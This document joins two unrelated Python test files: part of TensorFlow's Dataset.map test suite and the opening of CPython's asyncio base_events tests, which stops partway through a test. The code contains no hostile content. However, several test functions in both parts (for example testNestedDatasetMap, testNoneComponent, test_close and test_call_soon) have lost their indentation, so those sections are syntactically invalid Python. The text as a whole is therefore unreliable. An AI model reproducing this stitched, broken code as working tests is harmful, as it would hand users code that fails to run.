self.assertDatasetProduces(dataset, [(i, b"hello", 10) for i in range(10)])
  @combinations.generate(test_base.graph_only_combinations())
  def testWarnOnSeedFromOuterGraph(self):
    """Random ops that capture the outer graph's seed trigger a warning."""
    with ops.Graph().as_default() as g:
      g.seed = 10
      warnings.simplefilter("always")

      def _check_warning(caught_warnings, expected_result):
        # Scan captured warnings for the seed-capture message.
        found_warning = False
        for warning in caught_warnings:
          if ("Explicitly set the seed in the function if this is not the "
              "intended behavior" in str(warning)):
            found_warning = True
            break
        self.assertEqual(found_warning, expected_result)

      # map_fun doesn't use seed, so no warning is generated.
      with warnings.catch_warnings(record=True) as w:
        _ = dataset_ops.Dataset.range(10).map(math_ops.square)
      _check_warning(w, False)

      def random_func(x):
        x = math_ops.add(x, 1)
        random_ops.random_shuffle([x, math_ops.square(x)])
        return x

      # Unseeded random op inside the function: warning expected.
      with warnings.catch_warnings(record=True) as w:
        _ = dataset_ops.Dataset.range(10).map(random_func)
      _check_warning(w, True)

      def random_func_seeded(x):
        # Clearing the graph seed inside the function suppresses the warning.
        ops.get_default_graph().seed = None
        random_ops.random_shuffle(x)
        return x

      with warnings.catch_warnings(record=True) as w:
        _ = dataset_ops.Dataset.range(10).batch(2).map(random_func_seeded)
      _check_warning(w, False)

      # An explicit op-level seed also suppresses the warning.
      with warnings.catch_warnings(record=True) as w:
        _ = dataset_ops.Dataset.range(10).batch(2).map(
            lambda x: random_ops.random_shuffle(x, seed=37))
      _check_warning(w, False)
@combinations.generate(_test_combinations())
def testNestedDatasetMap(self, apply_map):
dataset = dataset_ops.Dataset.from_tensors([1.0, 2.0, 3.0])
dataset = apply_map(dataset, dataset_ops.Dataset.from_tensor_slices)
dataset = apply_map(dataset, lambda ds: ds.batch(3)).flat_map(lambda x: x)
self.assertDatasetProduces(dataset, expected_output=[[1.0, 2.0, 3.0]])
  @combinations.generate(_test_combinations())
  def testReturnValueError(self, apply_map):
    """Unsupported map return values raise TypeError with a clear message."""
    dataset = dataset_ops.Dataset.from_tensors([1.0, 2.0, 3.0])
    with self.assertRaisesRegex(
        TypeError, r"Unsupported return value from function passed to "
        r"Dataset.map\(\)"):
      # NOTE(review): `Foo` is presumably defined elsewhere in this file and
      # is not convertible to a dataset element — confirm against module scope.
      _ = apply_map(dataset, lambda x: Foo)
  @combinations.generate(test_base.default_test_combinations())
  def testBrokenFunctionErrorOnInitialization(self):
    """A map function that fails op construction reports the error lazily."""
    dataset = dataset_ops.Dataset.from_tensor_slices([1.0, 2.0, 3.0])

    def broken_function(_):
      """A function deliberately designed to fail on instantiation."""
      value = []
      tensor_value = attr_value_pb2.AttrValue()
      tensor_value.tensor.CopyFrom(
          tensor_util.make_tensor_proto(
              value, dtype=dtypes.float32, shape=[0], verify_shape=False))
      dtype_value = attr_value_pb2.AttrValue(type=dtypes.int32.as_datatype_enum)

      # Create a "Const" op with a `tf.float32` value and a `tf.int32` type.
      const_tensor = ops.get_default_graph().create_op(
          "Const", [], [dtypes.int32],
          attrs={
              "value": tensor_value,
              "dtype": dtype_value
          },
          name="BrokenConst").outputs[0]
      return const_tensor

    dataset = dataset.map(broken_function)
    # The mismatch surfaces as InvalidArgumentError when producing elements.
    self.assertDatasetProduces(
        dataset, expected_error=(errors.InvalidArgumentError, "Type mismatch"))
  @combinations.generate(
      combinations.times(
          _test_combinations_with_mode("graph"),
          combinations.combine(num_parallel_calls=[None, 12])))
  def testNoInterOpParallelism(self, apply_map, num_parallel_calls):
    """With inter-op parallelism disabled, all py_funcs share one thread."""
    dataset = dataset_ops.Dataset.from_tensors(0)

    def _get_tid():
      return np.int64(threading.current_thread().ident)

    def _map_fn(_):
      tids = []
      for _ in range(10):
        tids.append(script_ops.py_func(_get_tid, [], dtypes.int64))
      return tids

    dataset = apply_map(dataset, _map_fn)
    # Force the map op to run without inter-op parallelism (private attrs).
    dataset._variant_tensor.op._set_attr("use_inter_op_parallelism",
                                         attr_value_pb2.AttrValue(b=False))
    get_next = self.getNext(dataset)
    tids = self.evaluate(get_next())
    # All ten py_func invocations must report the same thread id.
    self.assertTrue(all(tids[0] == tid for tid in tids))
  @combinations.generate(
      combinations.times(_test_combinations(), _short_circuit_test_cases(),
                         combinations.combine(num_parallel_calls=[None, 12])))
  def testShortCircuit(self, apply_map, structure, fn, num_parallel_calls):
    """Short-circuitable map fns produce the same result as calling `fn`."""
    dataset = self.structuredDataset(structure).repeat()
    dataset = apply_map(dataset, fn, num_parallel_calls=num_parallel_calls)
    get_next = self.getNext(dataset)
    # Tuples are splatted into `fn`; scalars are passed directly.
    if isinstance(structure, tuple):
      expected = fn(*self.evaluate(self.structuredElement(structure)))
    else:
      expected = fn(self.evaluate(self.structuredElement(structure)))
    self.assertEqual(expected, self.evaluate(get_next()))
  @combinations.generate(
      combinations.times(_test_combinations(),
                         combinations.combine(num_parallel_calls=[None, 12])))
  def testShortCircuitCapturedInput(self, apply_map, num_parallel_calls):
    """A map fn returning only a captured value still works under map."""
    captured_t = variables.Variable(42)
    dataset = self.structuredDataset(None).repeat()
    dataset = apply_map(
        dataset, lambda x: captured_t, num_parallel_calls=num_parallel_calls)
    self.evaluate(variables.global_variables_initializer())
    get_next = self.getNext(dataset, requires_initialization=True)
    self.assertEqual(42, self.evaluate(get_next()))
  @combinations.generate(
      combinations.combine(
          tf_api_version=2,
          mode=["eager", "graph"],
          num_parallel_calls=[None, 12]))
  def testPreserveCardinality(self, num_parallel_calls):
    """In TF2, StopIteration escaping a py_func is an InvalidArgumentError."""

    def py_fn(_):
      raise StopIteration()

    dataset = dataset_ops.Dataset.from_tensors(0).map(
        lambda x: script_ops.py_func(py_fn, [x], dtypes.int64),
        num_parallel_calls=num_parallel_calls)
    get_next = self.getNext(dataset)
    with self.assertRaises(errors.InvalidArgumentError):
      self.evaluate(get_next())
  @combinations.generate(_test_combinations_with_mode("graph"))
  def testCollectionCopy(self, apply_map):
    """Graph collections remain visible inside the map function."""
    w = variable_scope.get_variable("w", [])
    self.assertIn(w, ops.get_collection(ops.GraphKeys.GLOBAL_VARIABLES))

    def func(x):
      # The collection lookup inside the map function must still find `w`.
      self.assertIn(w, ops.get_collection(ops.GraphKeys.GLOBAL_VARIABLES))
      return x

    dataset = dataset_ops.Dataset.from_tensors(constant_op.constant(1.0))
    _ = apply_map(dataset, func)
  @combinations.generate(
      combinations.times(
          _test_combinations_with_mode_v1("graph"),
          combinations.combine(num_parallel_calls=[None, 12])))
  def testMapCancellation(self, apply_map, num_parallel_calls):
    """Closing the session cancels an in-flight map computation."""
    # Checks that a cancellation is threaded through to the map transformation.
    queue = data_flow_ops.FIFOQueue(10, dtypes.int32, ())

    def fn(_):
      # Blocks forever: nothing is ever enqueued.
      return queue.dequeue()

    dataset = dataset_ops.Dataset.range(1)
    dataset = apply_map(dataset, fn, num_parallel_calls=num_parallel_calls)
    get_next = self.getNext(dataset, requires_initialization=True)

    with self.cached_session() as sess:
      thread = self.checkedThread(self.assert_op_cancelled, args=(get_next(),))
      thread.start()
      time.sleep(0.2)
      sess.close()
      thread.join()
  # TODO(b/126553094): map doesn't work with a variable defined inside the
  # function in eager mode; Graph tensors possibly leak out of the function
  # building context from the function graph in eager mode as variables are
  # created in init_scope.
  @combinations.generate(test_base.graph_only_combinations())
  def testCreateVariableInsideFunctionWithGetter(self):
    """A variable created via a variable-scope getter inside the map fn."""

    def func(_):
      with variable_scope.variable_scope(
          "variable", reuse=variable_scope.AUTO_REUSE):
        counter_var = variable_scope.get_variable(
            "counter", (), dtypes.int32, use_resource=True)
      return counter_var.assign_add(1)

    dataset = dataset_ops.Dataset.from_tensors(0).repeat(10)

    if hasattr(dataset, "map_with_legacy_function"):
      # NOTE: In the legacy function, resource is captured by value.
      with self.assertRaisesWithPredicateMatch(
          AttributeError, "'Tensor' object has no attribute 'assign_add'"):
        dataset.map_with_legacy_function(func)

    dataset = dataset.map(func)
    self.evaluate(variables.global_variables_initializer())
    get_next = self.getNext(dataset, requires_initialization=True)

    # The counter is incremented once per produced element.
    for i in range(10):
      self.assertEqual(i + 1, self.evaluate(get_next()))
    with self.assertRaises(errors.OutOfRangeError):
      self.evaluate(get_next())
  @combinations.generate(_test_combinations())
  def testCaptureVariable(self, apply_map):
    """A captured resource variable is incremented once per element."""
    counter_var = variable_scope.get_variable(
        "counter", (), dtypes.int32, use_resource=True)
    dataset = dataset_ops.Dataset.from_tensors(0).repeat(10)
    dataset = apply_map(dataset, lambda _: counter_var.assign_add(1))
    get_next = self.getNext(dataset, requires_initialization=True)

    self.evaluate(counter_var.initializer)
    for i in range(10):
      # The variable only advances when an element is actually produced.
      self.assertEqual(i, self.evaluate(counter_var))
      self.assertEqual(i + 1, self.evaluate(get_next()))
    self.assertEqual(10, self.evaluate(counter_var))
    with self.assertRaises(errors.OutOfRangeError):
      self.evaluate(get_next())
    self.assertEqual(10, self.evaluate(counter_var))
  @combinations.generate(_test_combinations_with_mode_v1("graph"))
  def testCaptureUninitializedVariableError(self, apply_map):
    """Reading a captured but uninitialized variable fails with NotFound."""
    counter_var = variable_scope.get_variable(
        "counter", (), dtypes.int32, use_resource=True)
    dataset = dataset_ops.Dataset.from_tensors(0).repeat(10)
    dataset = apply_map(dataset, lambda _: counter_var.assign_add(1))

    get_next = self.getNext(dataset, requires_initialization=True)
    with self.assertRaises(errors.NotFoundError):
      self.evaluate(get_next())
  # TODO(b/121264236): add eager mode coverage when we have multi-device setup.
  @combinations.generate(_test_combinations_with_mode_v1("graph"))
  def testCaptureConstantsWithConflictingDevices(self, apply_map):
    """Constants pinned to different devices can both be captured."""
    config = config_pb2.ConfigProto(device_count={"CPU": 3})
    with self.cached_session(config=config):
      with ops.device("/device:CPU:0"):
        a = constant_op.constant(3.0)
      with ops.device("/device:CPU:1"):
        b = constant_op.constant(5.0)

      def func(_):
        return math_ops.add(a, b)

      dataset = dataset_ops.Dataset.from_tensors(0).repeat(10)
      dataset = apply_map(dataset, func)
      expected_output = [8.0] * 10
      self.assertDatasetProduces(dataset, expected_output=expected_output)
  # TODO(b/121264236): add eager mode coverage when we have multi-device setup.
  @combinations.generate(_test_combinations_with_mode_v1("graph"))
  def testReferenceVariablesWithMultipleDevices(self, apply_map):
    """Reference variables on different devices work inside the map fn."""
    config = config_pb2.ConfigProto(device_count={"CPU": 3})
    with self.cached_session(config=config):

      def func(_):
        with ops.device("/device:CPU:0"):
          a = variables.VariableV1(3.0)
        with ops.device("/device:CPU:1"):
          b = variables.VariableV1(5.0)
        return math_ops.add(a, b)

      # NOTE: Use the legacy function implementation as eager function will
      # convert RefVariables to ResourceVariables.
      dataset = dataset_ops.Dataset.from_tensors(0).repeat(10)
      dataset = apply_map(dataset, func)
      self.evaluate(variables.global_variables_initializer())
      expected_output = [8.0] * 10
      self.assertDatasetProduces(
          dataset,
          expected_output=expected_output,
          requires_initialization=True)
  # TODO(b/121264236): add eager mode coverage when we have multi-device setup.
  @combinations.generate(_test_combinations_with_mode_v1("graph"))
  def testResourceVariablesWithMultipleDevices(self, apply_map):
    """Resource variables on different devices work inside the map fn."""
    config = config_pb2.ConfigProto(device_count={"CPU": 3})

    def func(_):
      with variable_scope.variable_scope(
          "variable", reuse=variable_scope.AUTO_REUSE):
        with ops.device("/device:CPU:0"):
          a_var = variable_scope.get_variable(
              "a", (), dtypes.int32, use_resource=True)
          a_var = math_ops.add(a_var, 1)
        with ops.device("/device:CPU:1"):
          b_var = variable_scope.get_variable(
              "b", (), dtypes.int32, use_resource=True)
      # Both variables initialize to 0, so each element is (0 + 1) + 0 == 1.
      return math_ops.add(a_var, b_var)

    g = ops.Graph()
    with self.session(config=config, graph=g):
      dataset = dataset_ops.Dataset.from_tensors(0).repeat(10)
      dataset = apply_map(dataset, func)
      self.evaluate(variables.global_variables_initializer())
      expected_output = [1] * 10
      self.assertDatasetProduces(
          dataset,
          expected_output=expected_output,
          requires_initialization=True)
  @combinations.generate(
      combinations.times(
          _test_combinations(),
          combinations.combine(
              local_determinism=[None, True, False],
              global_determinism=[True, False])))
  def testDeterminismConfiguration(self, apply_map, local_determinism,
                                   global_determinism):
    """The per-op `deterministic` argument overrides the global option."""
    # Local setting wins when present; otherwise fall back to the global one.
    expect_determinism = local_determinism or (local_determinism is None and
                                               global_determinism)
    elements = list(range(1000))

    def dataset_fn(delay_ms):

      def sleep(x):
        time.sleep(delay_ms / 1000)
        return x

      def map_function(x):
        # Delay only element 0 so out-of-order completion becomes possible.
        if math_ops.equal(x, 0):
          return script_ops.py_func(sleep, [x], x.dtype)
        else:
          return x

      dataset = dataset_ops.Dataset.from_tensor_slices(elements)
      dataset = apply_map(
          dataset,
          map_function,
          num_parallel_calls=2,
          deterministic=local_determinism)
      opts = options_lib.Options()
      opts.deterministic = global_determinism
      dataset = dataset.with_options(opts)
      return dataset

    self.checkDeterminism(
        dataset_fn, expect_determinism, expected_elements=elements)
@combinations.generate(_test_combinations())
def testNoneComponent(self, apply_map):
dataset = dataset_ops.Dataset.from_tensors((42, None))
def map_function(x, y):
if y is None:
return x / 2
return x
dataset = apply_map(dataset, map_function)
self.assertDatasetProduces(dataset, expected_output=[21])
  @combinations.generate(test_base.eager_only_combinations())
  def testCheckpointLargeBuffer(self):
    """Checkpointing a parallel-map buffer larger than 2GB succeeds."""
    if pywrap_sanitizers.is_tsan_enabled():
      self.skipTest("Creating a large buffer causes OOM when using tsan.")
    # Tensor of size 512M
    dataset = dataset_ops.Dataset.from_tensors(
        array_ops.ones((128, 1024, 1024), dtype=dtypes.float32))
    dataset = dataset.repeat()
    # Set parallelism to 5 to exceed the 2GB protobuf limit
    dataset = dataset.map(lambda x: x * 2, num_parallel_calls=5)
    iterator = iter(dataset)
    next(iterator)  # request an element to fill the parallel map buffer
    ckpt = trackable_utils.Checkpoint(iterator=iterator)
    manager = checkpoint_management.CheckpointManager(
        ckpt, self.get_temp_dir(), max_to_keep=1)
    manager.save()
@combinations.generate(
combinations.times(test_base.default_test_combinations(),
combinations.combine(num_parallel_calls=[None, 1])))
def testName(self, num_parallel_calls):
dataset = dataset_ops.Dataset.from_tensors(21).map(
lambda x: x * 2, num_parallel_calls=num_parallel_calls, name="map")
self.assertDatasetProduces(dataset, [42])
class MapCheckpointTest(checkpoint_test_base.CheckpointTestBase,
                        parameterized.TestCase):
  """Checkpoint/restore coverage for the `map` transformation."""

  @combinations.generate(
      combinations.times(test_base.default_test_combinations(),
                         checkpoint_test_base.default_test_combinations(),
                         combinations.combine(num_parallel_calls=[None, 2])))
  def testCore(self, verify_fn, num_parallel_calls):
    """Round-trips a repeated, mapped tensor-slice dataset."""
    tensor_slice_len = 7
    num_epochs = 2
    multiplier = 37.0

    def _build_ds():
      components = (np.arange(tensor_slice_len), np.array([[1, 2, 3]]) *
                    np.arange(tensor_slice_len)[:, np.newaxis],
                    np.array(multiplier) * np.arange(tensor_slice_len))

      def _map_fn(x, y, z):
        return math_ops.square(x), math_ops.square(y), math_ops.square(z)

      return (dataset_ops.Dataset.from_tensor_slices(components).map(
          _map_fn, num_parallel_calls=num_parallel_calls).repeat(num_epochs))

    verify_fn(self, _build_ds, tensor_slice_len * num_epochs)

  @combinations.generate(
      combinations.times(test_base.default_test_combinations(),
                         combinations.combine(num_parallel_calls=[None, 2])))
  def testSaveStatefulFunction(self, num_parallel_calls):
    """Saving a dataset whose map function is stateful (random) must fail."""

    def _build_ds():

      def _map_fn(x):
        return random_ops.random_uniform(
            (), 0, 10, dtype=dtypes.int32) * math_ops.cast(x, dtypes.int32)

      return dataset_ops.Dataset.range(100).map(
          _map_fn, num_parallel_calls=num_parallel_calls)

    self.verify_error_on_save(_build_ds, 15, errors.FailedPreconditionError)

  @combinations.generate(
      combinations.times(test_base.default_test_combinations(),
                         combinations.combine(num_parallel_calls=[None, 2])))
  def testCaptureVariableInMapFn(self, num_parallel_calls):
    """Saving a dataset whose map fn captures a variable must fail."""

    def _build_ds():
      counter_var = variable_scope.get_variable(
          "counter", (), dtypes.int32, use_resource=True)
      return (dataset_ops.Dataset.from_tensors(0).repeat(10).map(
          lambda _: counter_var.assign_add(1),
          num_parallel_calls=num_parallel_calls))

    self.verify_error_on_save(_build_ds, 15, errors.FailedPreconditionError)

  @combinations.generate(
      combinations.times(test_base.default_test_combinations(),
                         checkpoint_test_base.default_test_combinations(),
                         combinations.combine(num_parallel_calls=[None, 2])))
  def testCaptureConstantInMapFn(self, verify_fn, num_parallel_calls):
    """Captured constants are compatible with checkpointing."""
    num_outputs = 10

    def _build_ds():
      constant_var = constant_op.constant(5)
      return (dataset_ops.Dataset.from_tensors(0).repeat(10).map(
          lambda x: x + constant_var, num_parallel_calls=num_parallel_calls))

    verify_fn(self, _build_ds, num_outputs)

  @combinations.generate(
      combinations.times(test_base.default_test_combinations(),
                         checkpoint_test_base.default_test_combinations(),
                         combinations.combine(num_parallel_calls=[None, 2])))
  def testCaptureDefunInMapFn(self, verify_fn, num_parallel_calls):
    """A `Defun` used as the map function is compatible with checkpointing."""
    num_outputs = 10

    def _build_ds():

      @function.Defun(dtypes.int64)
      def defun_fn(x):
        return constant_op.constant(1000) + math_ops.cast(x, dtypes.int32)

      return dataset_ops.Dataset.range(num_outputs).map(
          defun_fn, num_parallel_calls=num_parallel_calls)

    verify_fn(self, _build_ds, num_outputs)

  @combinations.generate(
      combinations.times(test_base.default_test_combinations(),
                         checkpoint_test_base.default_test_combinations(),
                         combinations.combine(num_parallel_calls=[None, 2])))
  def testBuildDefunInMapFn(self, verify_fn, num_parallel_calls):
    """A `Defun` built inside another `Defun` map fn checkpoints correctly."""
    num_outputs = 10

    def _build_ds():

      @function.Defun(dtypes.int64)
      def defun_fn(x):

        @function.Defun(dtypes.int32)
        def defun_fn_deep(x):
          return constant_op.constant(1000) + math_ops.cast(x, dtypes.int32)

        return constant_op.constant(11000) + defun_fn_deep(
            math_ops.cast(x, dtypes.int32))

      return dataset_ops.Dataset.range(num_outputs).map(
          defun_fn, num_parallel_calls=num_parallel_calls)

    verify_fn(self, _build_ds, num_outputs)

  @combinations.generate(
      combinations.times(test_base.default_test_combinations(),
                         checkpoint_test_base.default_test_combinations(),
                         combinations.combine(num_parallel_calls=[None, 2])))
  def testSparse(self, verify_fn, num_parallel_calls):
    """Sparse map outputs are compatible with checkpointing."""

    def _sparse(i):
      return sparse_tensor.SparseTensorValue(
          indices=np.array([[0, 0]]),
          values=(i * np.array([1])),
          dense_shape=np.array([1, 1]))

    def _build_ds(num_outputs):
      return dataset_ops.Dataset.range(num_outputs).map(
          _sparse, num_parallel_calls=num_parallel_calls)

    num_outputs = 10
    verify_fn(self, lambda: _build_ds(num_outputs), num_outputs=num_outputs)
# Standard TensorFlow test entry point.
if __name__ == "__main__":
  test.main()
|
test_base_events.py | """Tests for base_events.py"""
import errno
import logging
import math
import os
import socket
import sys
import threading
import time
import unittest
from unittest import mock
import asyncio
from asyncio import base_events
from asyncio import constants
from asyncio import test_utils
try:
from test import support
except ImportError:
from asyncio import test_support as support
try:
from test.support.script_helper import assert_python_ok
except ImportError:
try:
from test.script_helper import assert_python_ok
except ImportError:
from asyncio.test_support import assert_python_ok
# Alias that makes call-argument assertions read more naturally.
MOCK_ANY = mock.ANY
# True on Python 3.4+; used to gate version-dependent expectations.
PY34 = sys.version_info >= (3, 4)
def mock_socket_module():
    """Build a MagicMock standing in for the `socket` module.

    Constants (and `inet_pton`) present on the host platform are copied onto
    the mock; names the platform lacks are removed so `hasattr` checks behave
    the same as on the real module.
    """
    m_socket = mock.MagicMock(spec=socket)
    mirrored_names = (
        'AF_INET', 'AF_INET6', 'AF_UNSPEC', 'IPPROTO_TCP', 'IPPROTO_UDP',
        'SOCK_STREAM', 'SOCK_DGRAM', 'SOL_SOCKET', 'SO_REUSEADDR', 'inet_pton'
    )
    for attr in mirrored_names:
        if hasattr(socket, attr):
            setattr(m_socket, attr, getattr(socket, attr))
        else:
            delattr(m_socket, attr)

    m_socket.socket = mock.MagicMock()
    m_socket.socket.return_value = test_utils.mock_nonblocking_socket()
    # getaddrinfo must not look like a coroutine to the event loop.
    m_socket.getaddrinfo._is_coroutine = False
    return m_socket
def patch_socket(f):
    """Decorate *f* so `asyncio.base_events.socket` is a fresh socket mock."""
    patcher = mock.patch('asyncio.base_events.socket',
                         new_callable=mock_socket_module)
    return patcher(f)
class BaseEventTests(test_utils.TestCase):
    """Tests for module-level helpers in asyncio.base_events."""

    def test_ipaddr_info(self):
        """_ipaddr_info resolves literal IP addresses without getaddrinfo."""
        UNSPEC = socket.AF_UNSPEC
        INET = socket.AF_INET
        INET6 = socket.AF_INET6
        STREAM = socket.SOCK_STREAM
        DGRAM = socket.SOCK_DGRAM
        TCP = socket.IPPROTO_TCP
        UDP = socket.IPPROTO_UDP

        self.assertEqual(
            (INET, STREAM, TCP, '', ('1.2.3.4', 1)),
            base_events._ipaddr_info('1.2.3.4', 1, INET, STREAM, TCP))

        # bytes host literals are accepted too.
        self.assertEqual(
            (INET, STREAM, TCP, '', ('1.2.3.4', 1)),
            base_events._ipaddr_info(b'1.2.3.4', 1, INET, STREAM, TCP))

        self.assertEqual(
            (INET, STREAM, TCP, '', ('1.2.3.4', 1)),
            base_events._ipaddr_info('1.2.3.4', 1, UNSPEC, STREAM, TCP))

        self.assertEqual(
            (INET, DGRAM, UDP, '', ('1.2.3.4', 1)),
            base_events._ipaddr_info('1.2.3.4', 1, UNSPEC, DGRAM, UDP))

        # Socket type STREAM implies TCP protocol.
        self.assertEqual(
            (INET, STREAM, TCP, '', ('1.2.3.4', 1)),
            base_events._ipaddr_info('1.2.3.4', 1, UNSPEC, STREAM, 0))

        # Socket type DGRAM implies UDP protocol.
        self.assertEqual(
            (INET, DGRAM, UDP, '', ('1.2.3.4', 1)),
            base_events._ipaddr_info('1.2.3.4', 1, UNSPEC, DGRAM, 0))

        # No socket type.
        self.assertIsNone(
            base_events._ipaddr_info('1.2.3.4', 1, UNSPEC, 0, 0))

        # IPv4 address with family IPv6.
        self.assertIsNone(
            base_events._ipaddr_info('1.2.3.4', 1, INET6, STREAM, TCP))

        self.assertEqual(
            (INET6, STREAM, TCP, '', ('::3', 1)),
            base_events._ipaddr_info('::3', 1, INET6, STREAM, TCP))

        self.assertEqual(
            (INET6, STREAM, TCP, '', ('::3', 1)),
            base_events._ipaddr_info('::3', 1, UNSPEC, STREAM, TCP))

        # IPv6 address with family IPv4.
        self.assertIsNone(
            base_events._ipaddr_info('::3', 1, INET, STREAM, TCP))

        # IPv6 address with zone index.
        self.assertIsNone(
            base_events._ipaddr_info('::3%lo0', 1, INET6, STREAM, TCP))

    def test_port_parameter_types(self):
        """Ports given as None, empty, str or bytes are normalized to ints."""
        # Test obscure kinds of arguments for "port".
        INET = socket.AF_INET
        STREAM = socket.SOCK_STREAM
        TCP = socket.IPPROTO_TCP

        self.assertEqual(
            (INET, STREAM, TCP, '', ('1.2.3.4', 0)),
            base_events._ipaddr_info('1.2.3.4', None, INET, STREAM, TCP))

        self.assertEqual(
            (INET, STREAM, TCP, '', ('1.2.3.4', 0)),
            base_events._ipaddr_info('1.2.3.4', b'', INET, STREAM, TCP))

        self.assertEqual(
            (INET, STREAM, TCP, '', ('1.2.3.4', 0)),
            base_events._ipaddr_info('1.2.3.4', '', INET, STREAM, TCP))

        self.assertEqual(
            (INET, STREAM, TCP, '', ('1.2.3.4', 1)),
            base_events._ipaddr_info('1.2.3.4', '1', INET, STREAM, TCP))

        self.assertEqual(
            (INET, STREAM, TCP, '', ('1.2.3.4', 1)),
            base_events._ipaddr_info('1.2.3.4', b'1', INET, STREAM, TCP))

    @patch_socket
    def test_ipaddr_info_no_inet_pton(self, m_socket):
        """Without inet_pton the helper cannot resolve and returns None."""
        del m_socket.inet_pton
        self.assertIsNone(base_events._ipaddr_info('1.2.3.4', 1,
                                                   socket.AF_INET,
                                                   socket.SOCK_STREAM,
                                                   socket.IPPROTO_TCP))
class BaseEventLoopTests(test_utils.TestCase):
    def setUp(self):
        """Create a BaseEventLoop with a mocked, always-idle selector."""
        super().setUp()
        self.loop = base_events.BaseEventLoop()
        self.loop._selector = mock.Mock()
        # select() reports no I/O events, so _run_once never dispatches any.
        self.loop._selector.select.return_value = ()
        self.set_event_loop(self.loop)
    def test_not_implemented(self):
        """BaseEventLoop's transport factory hooks raise NotImplementedError."""
        m = mock.Mock()
        self.assertRaises(
            NotImplementedError,
            self.loop._make_socket_transport, m, m)
        self.assertRaises(
            NotImplementedError,
            self.loop._make_ssl_transport, m, m, m, m)
        self.assertRaises(
            NotImplementedError,
            self.loop._make_datagram_transport, m, m)
        self.assertRaises(
            NotImplementedError, self.loop._process_events, [])
        self.assertRaises(
            NotImplementedError, self.loop._write_to_self)
        self.assertRaises(
            NotImplementedError,
            self.loop._make_read_pipe_transport, m, m)
        self.assertRaises(
            NotImplementedError,
            self.loop._make_write_pipe_transport, m, m)
        # _make_subprocess_transport is a coroutine; it only raises once
        # iteration starts.
        gen = self.loop._make_subprocess_transport(m, m, m, m, m, m, m)
        with self.assertRaises(NotImplementedError):
            gen.send(None)
def test_close(self):
self.assertFalse(self.loop.is_closed())
self.loop.close()
self.assertTrue(self.loop.is_closed())
# it should be possible to call close() more than once
self.loop.close()
self.loop.close()
# operation blocked when the loop is closed
f = asyncio.Future(loop=self.loop)
self.assertRaises(RuntimeError, self.loop.run_forever)
self.assertRaises(RuntimeError, self.loop.run_until_complete, f)
def test__add_callback_handle(self):
h = asyncio.Handle(lambda: False, (), self.loop)
self.loop._add_callback(h)
self.assertFalse(self.loop._scheduled)
self.assertIn(h, self.loop._ready)
def test__add_callback_cancelled_handle(self):
h = asyncio.Handle(lambda: False, (), self.loop)
h.cancel()
self.loop._add_callback(h)
self.assertFalse(self.loop._scheduled)
self.assertFalse(self.loop._ready)
def test_set_default_executor(self):
executor = mock.Mock()
self.loop.set_default_executor(executor)
self.assertIs(executor, self.loop._default_executor)
    def test_getnameinfo(self):
        """getnameinfo delegates the blocking call to run_in_executor."""
        sockaddr = mock.Mock()
        self.loop.run_in_executor = mock.Mock()
        self.loop.getnameinfo(sockaddr)
        # None selects the default executor; flags default to 0.
        self.assertEqual(
            (None, socket.getnameinfo, sockaddr, 0),
            self.loop.run_in_executor.call_args[0])
def test_call_soon(self):
def cb():
pass
h = self.loop.call_soon(cb)
self.assertEqual(h._callback, cb)
self.assertIsInstance(h, asyncio.Handle)
self.assertIn(h, self.loop._ready)
    def test_call_soon_non_callable(self):
        """In debug mode, call_soon rejects non-callable arguments."""
        self.loop.set_debug(True)
        with self.assertRaisesRegex(TypeError, 'a callable object'):
            self.loop.call_soon(1)
def test_call_later(self):
def cb():
pass
h = self.loop.call_later(10.0, cb)
self.assertIsInstance(h, asyncio.TimerHandle)
self.assertIn(h, self.loop._scheduled)
self.assertNotIn(h, self.loop._ready)
    def test_call_later_negative_delays(self):
        """Overdue callbacks run ordered by deadline (most overdue first)."""
        calls = []

        def cb(arg):
            calls.append(arg)

        self.loop._process_events = mock.Mock()
        self.loop.call_later(-1, cb, 'a')
        self.loop.call_later(-2, cb, 'b')
        test_utils.run_briefly(self.loop)
        # -2 is an earlier deadline than -1, so 'b' fires first.
        self.assertEqual(calls, ['b', 'a'])
    def test_time_and_call_at(self):
        """call_at fires close to the requested loop-clock deadline."""

        def cb():
            self.loop.stop()

        self.loop._process_events = mock.Mock()
        delay = 0.1

        when = self.loop.time() + delay
        self.loop.call_at(when, cb)
        t0 = self.loop.time()
        self.loop.run_forever()
        dt = self.loop.time() - t0

        # 50 ms: maximum granularity of the event loop
        self.assertGreaterEqual(dt, delay - 0.050, dt)
        # tolerate a difference of +800 ms because some Python buildbots
        # are really slow
        self.assertLessEqual(dt, 0.9, dt)
    def check_thread(self, loop, debug):
        """Assert thread-affinity checks fire only when debug is enabled.

        Called from a thread that is NOT running `loop`: in debug mode the
        scheduling methods must raise RuntimeError; otherwise they succeed.
        """

        def cb():
            pass

        loop.set_debug(debug)
        if debug:
            msg = ("Non-thread-safe operation invoked on an event loop other "
                   "than the current one")
            with self.assertRaisesRegex(RuntimeError, msg):
                loop.call_soon(cb)
            with self.assertRaisesRegex(RuntimeError, msg):
                loop.call_later(60, cb)
            with self.assertRaisesRegex(RuntimeError, msg):
                loop.call_at(loop.time() + 60, cb)
        else:
            loop.call_soon(cb)
            loop.call_later(60, cb)
            loop.call_at(loop.time() + 60, cb)
    def test_check_thread(self):
        """Run check_thread from a second thread, with/without its own loop."""

        def check_in_thread(loop, event, debug, create_loop, fut):
            # wait until the event loop is running
            event.wait()
            try:
                if create_loop:
                    loop2 = base_events.BaseEventLoop()
                    try:
                        asyncio.set_event_loop(loop2)
                        self.check_thread(loop, debug)
                    finally:
                        asyncio.set_event_loop(None)
                        loop2.close()
                else:
                    self.check_thread(loop, debug)
            except Exception as exc:
                # Report failures back to the main thread via the future.
                loop.call_soon_threadsafe(fut.set_exception, exc)
            else:
                loop.call_soon_threadsafe(fut.set_result, None)

        def test_thread(loop, debug, create_loop=False):
            event = threading.Event()
            fut = asyncio.Future(loop=loop)
            loop.call_soon(event.set)
            args = (loop, event, debug, create_loop, fut)
            thread = threading.Thread(target=check_in_thread, args=args)
            thread.start()
            loop.run_until_complete(fut)
            thread.join()

        self.loop._process_events = mock.Mock()
        self.loop._write_to_self = mock.Mock()

        # raise RuntimeError if the thread has no event loop
        test_thread(self.loop, True)

        # check disabled if debug mode is disabled
        test_thread(self.loop, False)

        # raise RuntimeError if the event loop of the thread is not the called
        # event loop
        test_thread(self.loop, True, create_loop=True)

        # check disabled if debug mode is disabled
        test_thread(self.loop, False, create_loop=True)
def test_run_once_in_executor_plain(self):
    """run_in_executor() returns the future produced by the executor's submit()."""
    def cb():
        pass
    f = asyncio.Future(loop=self.loop)
    executor = mock.Mock()
